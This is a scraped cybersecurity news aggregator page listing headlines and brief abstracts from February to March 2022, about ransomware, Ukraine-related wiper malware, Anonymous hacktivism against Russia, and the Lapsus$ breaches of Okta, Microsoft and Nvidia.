While Twitter suspends some Anonymous accounts, the collective hacked All-Russia State Television and Radio Broadcasting Company (VGTRK). On Friday, Anonymous announced that the affiliate group Black Rabbit World has leaked 28 GB of data stolen from...Security Affairs
March 28, 2022
Chrome and Edge hit with V8 type confusion vulnerability with in-the-wild exploit Full Text
Abstract
Google is urging users on Windows, macOS, and Linux to update Chrome builds to version 99.0.4844.84, following the discovery of a vulnerability that has an exploit in the wild.ZDNet
March 28, 2022
Microsoft Exchange targeted for IcedID reply-chain hijacking attacks Full Text
Abstract
The distribution of the IcedID malware has returned to notable numbers thanks to a new campaign that hijacks existing email conversations threads and injects payloads that are hard to spot as malicious.BleepingComputer
March 26, 2022
Russian military behind hack of satellite communication devices in Ukraine at war’s outset, U.S. officials say Full Text
Abstract
U.S. intelligence analysts have concluded that Russian military spy hackers were behind a cyberattack on a satellite broadband service that disrupted Ukraine’s military communications at the start of the war last month.MSN
March 26, 2022
Chinese Threat Actor Scarab Found Targeting Ukraine Full Text
Abstract
The malicious activity by the threat actor dubbed UAC-0026 represents one of the first public examples of a Chinese threat actor targeting Ukraine since the invasion began.Sentinel One
March 24, 2022
Microsoft Azure Developers Awash in PII-Stealing npm Packages Full Text
Abstract
A large-scale, automated typosquatting attack saw 200+ malicious packages flood the npm code repository, targeting popular Azure scopes.Threatpost
March 24, 2022
Anonymous claims to have hacked the Central Bank of Russia Full Text
Abstract
The infamou hacker collective claims to have compromised the systems of the Central Bank of Russia and stolen 35,000 files, it announced that it will leak the files in 48 hours.Security Affairs
March 24, 2022
Researchers Trace LAPSUS$ Cyber Attacks to 16-Year-Old Hacker from England Full Text
Abstract
Authentication services provider Okta on Wednesday named Sitel as the third-party linked to a security incident experienced by the company in late January that allowed the LAPSUS$ extortion gang to remotely take over an internal account belonging to a customer support engineer. The company added that 366 corporate customers, or about 2.5% of its customer base, may have been impacted by the "highly constrained" compromise. "On January 20, 2022, the Okta Security team was alerted that a new factor was added to a Sitel customer support engineer' Okta account [from a new location]," Okta's Chief Security Officer, David Bradbury, said in a statement. "This factor was a password." The disclosure comes after LAPSUS$ posted screenshots of Okta's apps and systems earlier this week, about two months after the hackers gain access to the company's internal network over a five-day period between January 16 and 21, 2022 using remote desktop protoThe Hacker News
March 24, 2022
Anonymous claims to have hacked the Central Bank of Russia Full Text
Abstract
The Anonymous hacker collective claims to have hacked the Central Bank of Russia and stole accessed 35,000 documents. Anonymous continues to target Russian government organizations and private businesses, now it is claiming to have hacked the Central...Security Affairs
March 24, 2022
Okta says 375 customers impacted by the hack, but Lapsus$ gang says it is lying Full Text
Abstract
The provider of access management systems Okta confirmed the data breach and revealed that 2.5% of its customers were impacted. This week Lapsus$ extortion group claimed to have stolen sensitive data from the identity and access management giant...Security Affairs
March 23, 2022
Ukrainian enterprises hit with the DoubleZero wiper Full Text
Abstract
Ukraine CERT-UA warns of cyberattack aimed at Ukrainian enterprises using the a wiper dubbed DoubleZero. Ukraine CERT-UA continues to observe malware based attacks aimed at Ukrainian organizations, in a recent alert it warned of attacks employing...Security Affairs
March 23, 2022
New Mustang Panda hacking campaign targets diplomats, ISPs Full Text
Abstract
An ongoing Mustang Panda campaign that has started at least eight months ago has been uncovered by threat analysts who also managed to sample and analyze custom malware loaders and a new Korplug variant.BleepingComputer
March 23, 2022
Browser-in-the-Browser - An (Almost) Invisible Attack Full Text
Abstract
Researchers devised a new phishing technique, dubbed Browser-in-the-Browser (BitB) attack that lets cybercriminals spoof a browser window within a browser by leveraging a mix of HTML and CSS code. The novel BitB attack bypasses both a URL with HTTPS encryption and a hover-over-it security check.&nb ... Read MoreCyware Alerts - Hacker News
March 22, 2022
Microsoft confirms they were hacked by Lapsus$ extortion group Full Text
Abstract
Microsoft has confirmed that one of their employees was compromised by the Lapsus$ hacking group, allowing the threat actors to access and steal portions of their source code.BleepingComputer
March 22, 2022
A new wave of DeadBolt Ransomware attacks hit QNAP NAS devices  Full Text
Abstract
Internet search engine Censys reported a new wave of DeadBolt ransomware attacks targeting QNAP NAS devices. Internet search engine Censys reported that QNAP devices were targeted in a new wave of DeadBolt ransomware attacks. Since January, DeadBolt...Security Affairs
March 22, 2022
Scottish mental health charity “devastated” by heartless RansomEXX ransomware attack Full Text
Abstract
SAMH (the Scottish Association for Mental Health) helps provide care and support for adults and young people suffering from issues with their mental health, and campaigns to influence positive social change.Bit Defender
March 22, 2022
Serpent backdoor targets French entities with high-evasive attack chain Full Text
Abstract
A new email campaign aimed at French entities leverages the Chocolatey Windows package manager to deliver the Serpent backdoor. Proofpoint researchers uncovered a targeted attack leveraging an open-source package installer Chocolatey to deliver a backdoor...Security Affairs
March 22, 2022
Top Russian meat producer hit with Windows BitLocker encryption attack Full Text
Abstract
Moscow-based meat producer and distributor Miratorg Agribusiness Holding has suffered a major cyberattack that encrypted its IT systems, according to a report from Rosselkhoznadzor - the Russian federal veterinary and phytosanitary supervision service.BleepingComputer
March 21, 2022
Attackers Targeting Unpatched SolarWinds WHD Instances Full Text
Abstract
In the wake of new attacks, SolarWinds urged customers to remove their Web Help Desk instances from their publicly accessible infrastructure. An attacker may take advantage of unpatched WHD instances (CVE-2021-35251) for getting access to environmental details about the installation. SolarWinds rec ... Read MoreCyware Alerts - Hacker News
March 21, 2022
Serpent malware campaign abuses Chocolatey Windows package manager Full Text
Abstract
Threat actors are abusing the popular Chocolatey Windows package manager in a new phishing campaign to install new 'Serpent' backdoor malware on systems of French government agencies and large construction firms.BleepingComputer
March 21, 2022
GoDaddy Managed Hosting Service Targeted via Backdoor Infection Full Text
Abstract
The Wordfence Incident Response team alerted nearly 300 websites hosted on GoDaddy's Managed WordPress service that were infected with a common backdoor. The backdoor payload is a 2015 Google search SEO-poisoning tool. Website admins are suggested to remove the backdoor and spam search engine resul ... Read MoreCyware Alerts - Hacker News
March 19, 2022
Got Milk? After Supplier Hit by Cyberattack, a NH School District Is Short Full Text
Abstract
The school district said they were informed of the cyberattack on the dairy company. In a statement, the superintendent said the school anticipates milk shortages in the coming weeks.NBC Boston
March 19, 2022
Hackers hit mass background-check firm used by state agencies, universities Full Text
Abstract
Computer hackers made off with highly sensitive personal records on more than 164,000 job-seekers and license applicants in a virtual “smash and grab” attack last November on Creative Services Inc., a company that conducts background checks.Data Breaches
March 18, 2022
Hackers Target Bank Networks with new Rootkit to Steal Money from ATM Machines Full Text
Abstract
A financially motivated threat actor has been observed deploying a previously unknown rootkit targeting Oracle Solaris systems with the goal of compromising Automatic Teller Machine (ATM) switching networks and carrying out unauthorized cash withdrawals at different banks using fraudulent cards. Threat intelligence and incident response firm Mandiant is tracking the cluster under the moniker UNC2891, with some of the group's tactics, techniques, and procedures sharing overlaps with that of another cluster dubbed UNC1945 . The intrusions staged by the actor involve "a high degree of OPSEC and leverage both public and private malware, utilities, and scripts to remove evidence and hinder response efforts," Mandiant researchers said in a new report published this week. Even more concerningly, the attacks spanned several years in some cases, during the entirety of which the actor remained undetected by leveraging a rootkit called CAKETAP, which is designed to conceal nThe Hacker News
March 18, 2022
China-linked threat actors are targeting the government of Ukraine Full Text
Abstract
Google's TAG team revealed that China-linked APT groups are targeting Ukraine ’s government for intelligence purposes. Google's Threat Analysis Group (TAG) researchers uncovered cyberespionage operations conducted by the Chinese People's Liberation...Security Affairs
March 18, 2022
DarkHotel hacking campaign targets luxury Macao resorts Full Text
Abstract
The South Korean DarkHotel hacking group has been spotted in a new campaign spanning December 2021 through January 2022, targeting luxury hotels in Macao, China.BleepingComputer
March 18, 2022
Google: Chinese state hackers target Ukraine’s government Full Text
Abstract
Google's Threat Analysis Group (TAG) says the Chinese People's Liberation Army (PLA) and other Chinese intelligence agencies are trying to get more info on the ongoing Russian war in Ukraine.BleepingComputer
March 18, 2022
Japan’s Bridgestone confirms ransomware attack at US subsidiary Full Text
Abstract
Japanese tyre manufacturer Bridgestone has confirmed that its US subsidiary had suffered a ransomware attack, just weeks after suppliers of automaker Toyota Motor reported similar attacks.Channel News Asia
March 17, 2022
SolarWinds Warns of Attacks Targeting Web Help Desk Users Full Text
Abstract
SolarWinds warns customers of potential cyberattacks targeting unpatched installs of its Web Help Desk (WHD) product. SolarWinds has published a security advisory to warn customers of the risk of cyberattacks targeting unpatched Web Help Desk (WHD)...Security Affairs
March 17, 2022
New Wipers and Fake AV Updates Target Ukraine Full Text
Abstract
Researchers spotted the third wiper malware in use against Ukrainian organizations, which destroys user data and partition information from attached drives while also reporting a new phishing attack. The Ukrainian agency has linked the recent activity with the UAC-0056 group with medium confidence. ... Read MoreCyware Alerts - Hacker News
March 16, 2022
Unsecured Microsoft SQL, MySQL servers hit by Gh0stCringe malware Full Text
Abstract
Hackers target poorly secured Microsoft SQL and MySQL database servers to deploy the Gh0stCringe remote access trojans on vulnerable devices.BleepingComputer
March 16, 2022
Russia-linked threats actors exploited default MFA protocol and PrintNightmare bug to compromise NGO cloud Full Text
Abstract
FBI and CISA warn Russia-linked threats actors gained access to an NGO cloud after enrolling their own device in the organization's Duo MFA. The Federal Bureau of Investigation (FBI) and Cybersecurity and Infrastructure Security Agency (CISA) ...Security Affairs
March 16, 2022
SolarWinds warns of attacks targeting Web Help Desk instances Full Text
Abstract
SolarWinds warned customers of attacks targeting Internet-exposed Web Help Desk (WHD) instances and advised removing them from publicly accessible infrastructure (likely to prevent the exploitation of a potential security flaw).BleepingComputer
March 16, 2022
Emotet malware campaign impersonates the IRS for 2022 tax season Full Text
Abstract
The Emotet malware botnet is taking advantage of the 2022 U.S. tax season by sending out malicious emails pretending to be the Internal Revenue Service sending tax forms or federal returns.BleepingComputer
March 15, 2022
Pandora Ransomware Hits Giant Automotive Supplier Denso Full Text
Abstract
Denso confirmed that cybercriminals leaked stolen, classified information from the Japan-based car-components manufacturer after an attack on one of its offices in Germany.Threatpost
March 15, 2022
MuddyWater Uses SloughRAT To Target Turkey and Arabian Peninsula Full Text
Abstract
Iranian MuddyWater APT launched a new series of attacks targeting Turkey and the Arabian Peninsula. The recent intrusions appear to be a continuation of a November 2021 campaign targeting Turkish entities. Its malicious activities shows group's peaked interest in the region and geopolitics.Cyware Alerts - Hacker News
March 15, 2022
CaddyWiper, a new data wiper hits Ukraine Full Text
Abstract
Experts discovered a new wiper, tracked as CaddyWiper, that was employed in attacks targeting Ukrainian organizations. Experts at ESET Research Labs discovered a new data wiper, dubbed CaddyWiper, that was employed in attacks targeting Ukrainian organizations. The...Security Affairs
March 14, 2022
Fake antivirus updates used to deploy Cobalt Strike in Ukraine Full Text
Abstract
Ukraine's Computer Emergency Response Team is warning that threat actors are distributing fake Windows antivirus updates that install Cobalt Strike and other malware.BleepingComputer
March 14, 2022
China-based TA416 Ramp-Up Espionage Against European Governments Full Text
Abstract
A Chinese-backed threat group has been observed targeting European diplomatic entities indulging in refugee and migrant services. The group takes advantage of web bugs to profile its targets. An analysis revealed that the threat group is using an updated version of PlugX malware. To stay protected, ... Read MoreCyware Alerts - Hacker News
March 14, 2022
New CaddyWiper data wiping malware hits Ukrainian networks Full Text
Abstract
Newly discovered data-destroying malware was observed earlier today in attacks targeting Ukrainian organizations and deleting data across systems on compromised networks.BleepingComputer
March 14, 2022
Hackers Target German Branch of Russian Oil Giant Rosneft Full Text
Abstract
The German subsidiary of Russian energy giant Rosneft has been hit by a cyberattack, the Federal Office for Information Security (BSI) said on Monday, with hacker group Anonymous claiming responsibility.Security Week
March 14, 2022
Anonymous claims to have hacked German subsidiary of Russian energy giant Rosneft Full Text
Abstract
Anonymous claims to have hacked the systems of the German subsidiary of Russian energy giant Rosneft and stole 20TB of data. The Anonymous hacker collective claimed to have hacked the German branch of the Russian energy giant Rosneft. In hacktivists...Security Affairs
March 14, 2022
Brazilian trojan impacting Portuguese users and using the same capabilities seen in other Latin American threats Full Text
Abstract
The malware takes advantage of a template from the Portuguese Tax services (Autoridade Tributária e Aduaneira) to disseminate the threat in the wild. Maxtrilha uses the same templates to target users.Security Affairs
March 14, 2022
Automotive giant DENSO hit by new Pandora ransomware gang Full Text
Abstract
DENSO has published an announcement to confirm that its German business computer network was accessed by an unauthorized third party on March 10, 2022, resulting in a data breach.BleepingComputer
March 13, 2022
Anonymous sent a message to Russians: “remove Putin” Full Text
Abstract
Anonymous has published a new message for Russian citizens inviting them to remove Putin that is sacrificing them and killing Ukrainians. The hacker collective Anonymous has published a new message for Russians inviting them to wake up and remove...Security Affairs
March 12, 2022
Attackers use website contact forms to spread BazarLoader malware Full Text
Abstract
Threat actors are spreading the BazarLoader malware via website contact forms to evade detection, researchers warn. Researchers from cybersecurity firm Abnormal Security observed threat actors spreading the BazarLoader/BazarBackdoor malware via website...Security Affairs
March 12, 2022
Anonymous Hacks Russian Media Censoring Agency Roskomnadzor Full Text
Abstract
The international hacktivists collective Anonymous has struck again and this time the group is claiming to have hacked Roskomnadzor, a major Russian federal agency. The group also claims to have stolen over 360,000 files.Hackread
March 10, 2022
Iranian Hackers Targeting Turkey and Arabian Peninsula in New Malware Campaign Full Text
Abstract
The Iranian state-sponsored threat actor known as MuddyWater has been attributed to a new swarm of attacks targeting Turkey and the Arabian Peninsula with the goal of deploying remote access trojans (RATs) on compromised systems. "The MuddyWater supergroup is highly motivated and can use unauthorized access to conduct espionage, intellectual property theft, and deploy ransomware and destructive malware in an enterprise," Cisco Talos researchers Asheer Malhotra, Vitor Ventura, and Arnaud Zobec said in a report published today. The group, which has been active since at least 2017, is known for its attacks on various sectors that help further advance Iran's geopolitical and national security objectives. In January 2022, the U.S. Cyber Command attributed the actor to the country's Ministry of Intelligence and Security (MOIS). MuddyWater is also believed to be a "conglomerate of multiple teams operating independently rather than a single threat actor group,&qThe Hacker News
March 9, 2022
NVIDIA’s Code Signing Certificates Stolen and Abused in Attacks Full Text
Abstract
Lapsus$, responsible for the recent attack on Nvidia, reportedly released two of the company's old code-signing certificates, and threat actors have started abusing it. In some cases, the stolen certificates were used to sign Cobalt Strike beacons, Mimikatz, backdoors, and remote access trojans. Ad ... Read MoreCyware Alerts - Hacker News
March 9, 2022
Multiple Russian government websites hacked in a supply chain attack Full Text
Abstract
Threat actors hacked Russian federal agencies' websites in a supply chain attack involving the compromise of a stats widget. Some Russian federal agencies' websites were compromised in a supply chain attack, threat actors compromised the stats widget...Security Affairs
March 9, 2022
Anonymous hacked Russian cams, websites, announced a clamorous leak Full Text
Abstract
The collective Anonymous has hacked public cameras in Russia and transmitted their live feed on a website, it also announced a clamorous leak. Anonymous and other hacker groups continue to target Russia, in a recent attack the collective has taken...Security Affairs
March 09, 2022
Russian government sites hacked in supply chain attack Full Text
Abstract
Russia says some of its federal agencies' websites were compromised on Tuesday after unknown attackers hacked the stats widget used to track the number of visitors by multiple government agencies.BleepingComputer
March 9, 2022
New attack bypasses hardware defenses for Spectre flaw in Intel and ARM CPUs Full Text
Abstract
It is an extension of the 2017 Spectre version 2 attack, also known as Spectre-BTI (Branch Target Injection) and, just like Spectre v2, can result in the leak of sensitive information from the privileged kernel memory space.CSO Online
March 08, 2022
Google: Chinese hackers target Gmail users affiliated with US govt Full Text
Abstract
Google's Threat Analysis Group has warned multiple Gmail users that they were targeted in phishing attacks conducted by a Chinese-backed hacking group tracked as APT31.BleepingComputer
March 7, 2022
Novel Attack Turns Amazon Devices Against Themselves Full Text
Abstract
Researchers have discovered how to remotely manipulate the Amazon Echo through its own speakers.Threatpost
March 7, 2022
Anonymous hacked Russian streaming services to broadcast war footage Full Text
Abstract
Anonymous hacked into the most popular Russian streaming services to broadcast war footage from Ukraine. The popular hacker collective Anonymous continues to target Russian entities, a few hours ago the group hacked into the most popular Russian streaming...Security Affairs
March 07, 2022
Rompetrol gas station network hit by Hive ransomware Full Text
Abstract
Romania's Rompetrol gas station network has been hit by a ransomware attack. Rompetrol, owned by KMG International announced today that it was battling a "complex cyberattack." BleepingComputer has learned that the Hive ransomware gang is behind this attack.BleepingComputer
March 6, 2022
Charities and NGOs providing support in Ukraine hit by malware Full Text
Abstract
Malware based attacks are targeting charities and non-governmental organizations (NGOs) providing support in Ukraine Charities and non-governmental organizations (NGOs) that in these weeks are providing support in Ukraine are targeted by malware attacks...Security Affairs
March 5, 2022
European Officials Aiding the Ukrainian Refugee Movement are Under Attack Full Text
Abstract
Security researchers found a campaign, dubbed Asylum Ambuscade, targeting European government personnel helping Ukrainian refugees with attachments containing the SunSeed malware. The attachment uses the Emergency Meeting of the NATO Security Council as a lure. To stay protected, v ictims are urge ... Read MoreCyware Alerts - Hacker News
March 5, 2022
RuRAT Campaign Uses Innovative Lure to Target Potential Victims Full Text
Abstract
BleepingComputer spotted a spear-phishing campaign venture capital firm to infect victims with RuRAT malware and gain initial access to the targeted systems. The phishing email originates from an IP address belonging to a U.K virtual server company. Experts recommend always staying alert whene ... Read MoreCyware Alerts - Hacker News
March 5, 2022
Elon Musk warns of possible targeted attacks on Starlink in Ukraine Full Text
Abstract
SpaceX chief Elon Musk has expressed his concerns over the future of SpaceX’s Starlink service in Ukraine, given the current scenario of uncertainty in the country post the Russian invasion.Hackread
March 04, 2022
Amazon: Charities, aid orgs in Ukraine attacked with malware Full Text
Abstract
Charities and non-governmental organizations (NGOs) providing critical support in Ukraine are targeted in malware attacks aiming to disrupt their operations and relief efforts seeking to assist those affected by Russia's war.BleepingComputer
March 03, 2022
Malware campaign impersonates VC firm looking to buy sites Full Text
Abstract
BleepingComputer was recently contacted by an alleged "venture capitalist" firm that wanted to invest or purchase our site. However, as we later discovered, this was a malicious campaign designed to install malware that provides remote access to our devices.BleepingComputer
March 03, 2022
Ukraine cyber group to strike at Russia’s critical infrastructure Full Text
Abstract
A Ukrainian cyber guerrilla warfare group is planning to strike back against Russia, targeting the country’s critical infrastructure amid the Russian invasion of Ukraine.The Hill
March 03, 2022
Ukraine says local govt sites hacked to push fake capitulation news Full Text
Abstract
The Security Service of Ukraine (SSU) said today "enemy" hackers are using compromised local government and regional authorities' websites to push rumors that Ukraine surrendered and signed a peace treaty with Russia.BleepingComputer
March 3, 2022
Ukrainian WordPress sites under massive complex attacks Full Text
Abstract
Researchers observed a spike in the attacks against Ukrainian WordPress sites since the beginning of the military invasion of the country. Cyber attacks are an important component of the military strategy against Ukraine, experts observed a spike...Security Affairs
March 02, 2022
Hackers Try to Target European Officials to Get Info on Ukrainian Refugees, Supplies Full Text
Abstract
Details of a new nation-state sponsored phishing campaign have been uncovered setting its sights on European governmental entities in what's seen as an attempt to obtain intelligence on refugee and supply movement in the region. Enterprise security company Proofpoint, which detected the malicious emails for the first time on February 24, 2022, dubbed the social engineering attacks " Asylum Ambuscade ." "The email included a malicious macro attachment which utilized social engineering themes pertaining to the Emergency Meeting of the NATO Security Council held on February 23, 2022," researchers Michael Raggi and Zydeca Cass said in a report published Tuesday. "The email also contained a malicious attachment which attempted to download malicious Lua malware named SunSeed and targeted European government personnel tasked with managing transportation and population movement in Europe." The findings build on an advisory issued by the State ServiceThe Hacker News
March 2, 2022
NVIDIA discloses data breach after the recent ransomware attack Full Text
Abstract
Chipmaker giant Nvidia confirmed a data breach after the recently disclosed security incident, proprietary information stolen. The chipmaker giant Nvidia was recentty victim of a ransomware attack that impacted some of its systems for two days. The security...Security Affairs
March 2, 2022
WordPress-hosted Ukrainian University Websites Hacked in Targeted Attacks Full Text
Abstract
The group, whose members refer to themselves as ‘the Mx0nday’, have targeted the WordPress-hosted sites more than 100,000 times since February 24, when Russian troops officially invaded Ukraine.The Daily Swig
March 2, 2022
Anonymous and its affiliates continue to cause damage to Russia Full Text
Abstract
The massive operation launched by the Anonymous collective against Russia for its illegitimate invasion continues. The popular collective Anonymous, and its affiliates, relentlessly continue their offensive against Russian targets. In the last few hours,...Security Affairs
March 1, 2022
Ukraine Hit with Novel ‘FoxBlade’ Trojan Hours Before Invasion Full Text
Abstract
Microsoft detected cyberattacks launched against Ukraine hours before Russia’s tanks and missiles began to pummel the country last week.Threatpost
March 1, 2022
Microsoft Accounts Targeted by Russian-Themed Credential Harvesting Full Text
Abstract
Malicious emails warning Microsoft users of “unusual sign-on activity” from Russia are looking to capitalizing on the Ukrainian crisis.Threatpost
March 01, 2022
Second New ‘IsaacWiper’ Data Wiper Targets Ukraine After Russian Invasion Full Text
Abstract
A new data wiper malware has been observed deployed against an unnamed Ukrainian government network, a day after destructive cyber attacks struck multiple entities in the country preceding the start of Russia's military invasion. Slovak cybersecurity firm ESET dubbed the new malware " IsaacWiper ," which it said was detected on February 24 in an organization that was not affected by HermeticWiper (aka FoxBlade), another data wiping malware that targeted several organizations on February 23 as part of a sabotage operation aimed at rendering the machines inoperable. Further analysis of the HermeticWiper attacks, which infected at least five Ukrainian organizations, have revealed a worm constituent that propagates the malware across the compromised network and a ransomware module that acts as a "distraction from the wiper attacks," corroborating a prior report from Symantec. "These destructive attacks leveraged at least three components: HermeticWiperThe Hacker News
March 01, 2022
Microsoft Finds FoxBlade Malware Hit Ukraine Hours Before Russian Invasion Full Text
Abstract
Update: It's worth noting that the malware Microsoft tracks as FoxBlade is the same as the data wiper that's been denominated HermeticWiper (aka KillDisk). Microsoft on Monday disclosed that it detected a new round of offensive and destructive cyberattacks directed against Ukraine's digital infrastructure hours before Russia launched its first missile strikes last week. The intrusions involved the use of a never-before-seen malware package dubbed FoxBlade , according to the tech giant's Threat Intelligence Center (MSTIC), noting that it added new signatures to its Defender anti-malware service to detect the exploit within three hours of the discovery. "These recent and ongoing cyberattacks have been precisely targeted, and we have not seen the use of the indiscriminate malware technology that spread across Ukraine's economy and beyond its borders in the 2017 NotPetya attack ," Microsoft's President and Vice Chair, Brad Smith, said . AdditionThe Hacker News
March 01, 2022
China-linked Daxin Malware Targeted Multiple Governments in Espionage Attacks Full Text
Abstract
A previously undocumented espionage tool has been deployed against selected governments and other critical infrastructure targets as part of a long-running espionage campaign orchestrated by China-linked threat actors since at least 2013. Broadcom's Symantec Threat Hunter team characterized the backdoor, named Daxin , as a technologically advanced malware, allowing the attackers to carry out a variety of communications and information-gathering operations aimed at entities in the telecom, transportation, and manufacturing sectors that are of strategic interest to China. "Daxin malware is a highly sophisticated rootkit backdoor with complex, stealthy command-and-control (C2) functionality that enables remote actors to communicate with secured devices not connected directly to the internet," the U.S. Cybersecurity and Infrastructure Security Agency (CISA) said in an independent advisory. The implant takes the form of a Windows kernel driver that implements an elaborThe Hacker News
March 01, 2022
New worm and data wiper malware seen hitting Ukrainian networks Full Text
Abstract
Newly discovered malware was deployed in destructive attacks against Ukrainian organizations and governmental networks before and after Russia invaded the country on February 24.BleepingComputer
March 01, 2022
Reality Winner’s Twitter account was hacked to target journalists Full Text
Abstract
Twitter account of former intelligence specialist, Reality Winner was hacked over the weekend by threat actors looking to target journalists at prominent media organizations. After taking over Winner's verified Twitter account, hackers changed the profile name to "Feedback Team" to impersonate Twitter staff and began sending out DMs.BleepingComputer
March 1, 2022
FoxBlade malware targeted Ukrainian networks hours before Russia’s invasion Full Text
Abstract
Microsoft revealed that Ukrainian entities were targeted with a previous undetected malware, dubbed FoxBlade, several hours before the invasion. The Microsoft Threat Intelligence Center (MSTIC) continues to investigate the attacks that are targeting...Security Affairs
February 28, 2022
Axis Communications shares details on disruptive cyberattack Full Text
Abstract
Axis Communications has published a post mortem about a cyberattack that caused severe disruption in their systems, with some systems still partially offline.BleepingComputer
February 28, 2022
Microsoft: Ukraine hit with new FoxBlade malware hours before invasion Full Text
Abstract
Microsoft said that Ukrainian networks were targeted with newly found malware several hours before Russia's invasion of Ukraine on February 24th.BleepingComputer
February 28, 2022
UNC2596 Deploys Cuba Ransomware via Microsoft Exchange Server Vulnerabilities Full Text
Abstract
According to Mandiant, UNC2596 has been launching such campaigns since August 2021. It has targeted utility providers, government agencies, and organizations that support non-profits and healthcare entities.Cyware Alerts - Hacker News
February 28, 2022
Microsoft: Ukraine hit with new FoxBlade malware hours before invasion Full Text
Abstract
Microsoft said that Ukrainian networks were targeted with newly found malware several hours before Russia's invasion of Ukraine on February 24th.BleepingComputer
February 28, 2022
Defense Contractors Under Attack Using New SockDetour Backdoor Full Text
Abstract
The backdoor is associated with an APT campaign named TiltedTemple (aka DEV-0322). Recently, four defense contractors were targeted and one was compromised.Cyware Alerts - Hacker News
February 28, 2022
Ukraine says its ‘IT Army’ has taken down key Russian sites Full Text
Abstract
Key Russian websites and state online portals have been taken offline by attacks claimed by the Ukrainian cyber police force, which now openly engages in cyber-warfare.BleepingComputer
February 28, 2022
Insurance giant AON hit by a cyberattack over the weekend Full Text
Abstract
Professional services and insurance giant AON has suffered a cyberattack that impacted a "limited" number of systems.BleepingComputer
February 27, 2022
Chipmaker giant Nvidia hit by a ransomware attack Full Text
Abstract
The chipmaker giant Nvidia was the victim of a ransomware attack that took down some of its systems for two days. The chipmaker giant Nvidia was victim of a ransomware attack that impacted some of its systems for teo days. The security breach is not connected...Security Affairs
February 26, 2022
Anonymous hacked the Russian Defense Ministry and is targeting Russian companies Full Text
Abstract
Anonymous collective has hacked the Russian Defense Ministry and leaked the data of its employees in response to the Ukraine invasion. A few hours after the Anonymous collective has called to action against Russia following the illegitimate invasion...Security Affairs
February 26, 2022
Nvidia confirms it’s investigating an ‘incident,’ reportedly a cyberattack Full Text
Abstract
Nvidia confirmed that it was investigating an “incident” — hours after media reported that the graphics chipmaking giant had experienced a devastating cyberattack that “completely compromised” the company’s internal systems over the past two days.The Verge
February 25, 2022
GPU giant Nvidia is investigating a potential cyberattack Full Text
Abstract
US chipmaker giant Nvidia confirmed today it's currently investigating an "incident" that reportedly took down some of its systems for two days.BleepingComputer
February 25, 2022
Iran’s MuddyWater Hacker Group Using New Malware in Worldwide Cyber Attacks Full Text
Abstract
Cybersecurity agencies from the U.K. and the U.S. have laid bare a new malware used by the Iranian government-sponsored advanced persistent threat (APT) group in attacks targeting government and commercial networks worldwide. "MuddyWater actors are positioned both to provide stolen data and accesses to the Iranian government and to share these with other malicious cyber actors," the agencies said . The joint advisory comes courtesy of the Federal Bureau of Investigation (FBI), the Cybersecurity and Infrastructure Security Agency (CISA), the U.S. Cyber Command Cyber National Mission Force (CNMF), and the U.K.'s National Cyber Security Centre (NCSC). The cyberespionage actor was outed this year as conducting malicious operations as part of Iran's Ministry of Intelligence and Security (MOIS) targeting a wide range of government and private-sector organizations, including telecommunications, defense, local government, and oil and natural gas sectors, in Asia, AfricThe Hacker News
February 25, 2022
Russian Sandworm Distributes New Cyclops Blink Malware Full Text
Abstract
The U.S. and U.K released a joint security advisory warning that Russian-backed Sandworm has started using a new malware, dubbed Cyclops Blink. The group has mostly deployed the Cyclops Blink to WatchGuard devices. The joint advisory recommends referring to indicators of compromise and provides gui ... Read MoreCyware Alerts - Hacker News
February 25, 2022
Anonymous launched its offensive on Russia in response to the invasion of Ukraine Full Text
Abstract
The popular collective Anonymous declared war on Russia for the illegitimate invasion of Ukraine and announced a series of cyber attacks calling to action its members The Anonymous collective is calling to action against Russia following the illegitimate...Security Affairs
February 24, 2022
Cyberattackers Leverage DocuSign to Steal Microsoft Outlook Logins Full Text
Abstract
A targeted phishing attack takes aim at a major U.S. payments company.Threatpost
February 24, 2022
US defense contractors hit by stealthy SockDetour Windows backdoor Full Text
Abstract
A new custom malware dubbed SockDetour found on systems belonging to US defense contractors has been used as a backup backdoor to maintain access to compromised networks.BleepingComputer
February 24, 2022
Microsoft Exchange servers hacked to deploy Cuba ransomware Full Text
Abstract
The Cuba ransomware operation is exploiting Microsoft Exchange vulnerabilities to gain initial access to corporate networks and encrypt devices.BleepingComputer
February 24, 2022
Data wiper attacks on Ukraine were planned at least in November and used ransomware as decoy Full Text
Abstract
Experts reported that the wiper attacks that yesterday hit hundreds of systems in Ukraine used a GoLang-based ransomware decoy. Yesterday, researchers from cybersecurity firms ESET and Broadcom’s Symantec discovered a new data...Security Affairs
February 24, 2022
Defense contractors hit by stealthy SockDetour Windows backdoor Full Text
Abstract
A new custom malware dubbed SockDetour found on systems belonging to US defense contractors has been used as a backup backdoor to maintain access to compromised networks.BleepingComputer
February 24, 2022
Ransomware used as decoy in data-wiping attacks on Ukraine Full Text
Abstract
The new data wiper malware deployed on Ukrainian networks in destructive attacks on Wednesday right before Russia invaded Ukraine earlier today was, in some cases, accompanied by a GoLang-based ransomware decoy.BleepingComputer
February 23, 2022
Sextortion Rears Its Ugly Head Again Full Text
Abstract
Attackers are sending email blasts with malware links in embedded PDFs as a way to evade email filters, lying about having fictional "video evidence."Threatpost
February 23, 2022
New data-wiping malware used in destructive attacks on Ukraine Full Text
Abstract
Cybersecurity firms have found a new data wiper used in destructive attacks today against Ukrainian networks just as Russia moves troops into regions of Ukraine.BleepingComputer
February 23, 2022
Kostovite, Petrovite, and Erythrite Hacking Groups are Striking Industrial, Operational Technology Systems Full Text
Abstract
Three new threat groups targeting firms in the industrial sector have appeared but over half of all attacks are the work of only two known cybercriminal outfits, researchers say.ZDNet
February 23, 2022
DeadBolt ransomware now targets ASUSTOR devices, asks 50 BTC for master key Full Text
Abstract
The DeadBolt ransomware is now targeting ASUSTOR NAS devices by encrypting files and demanding a $1,150 ransom in bitcoins.BleepingComputer
February 23, 2022
Iranian Broadcaster IRIB hit by wiper malware Full Text
Abstract
Iranian national media corporation, Islamic Republic of Iran Broadcasting (IRIB), was hit by a wiper malware in late January 2022. An investigation into the attack that hit the Islamic Republic of Iran Broadcasting (IRIB) in late January, revealed...Security Affairs
February 22, 2022
Threat actors target poorly protected Microsoft SQL Servers Full Text
Abstract
Threat actors install Cobalt Strike beacons on vulnerable Microsoft SQL Servers to achieve a foothold in the target network. Researchers from Ahn Lab's ASEC spotted a new wave of attacks deploying Cobalt Strike beacons on vulnerable Microsoft SQL Servers...Security Affairs
February 22, 2022
Vulnerable Microsoft SQL Servers targeted with Cobalt Strike Full Text
Abstract
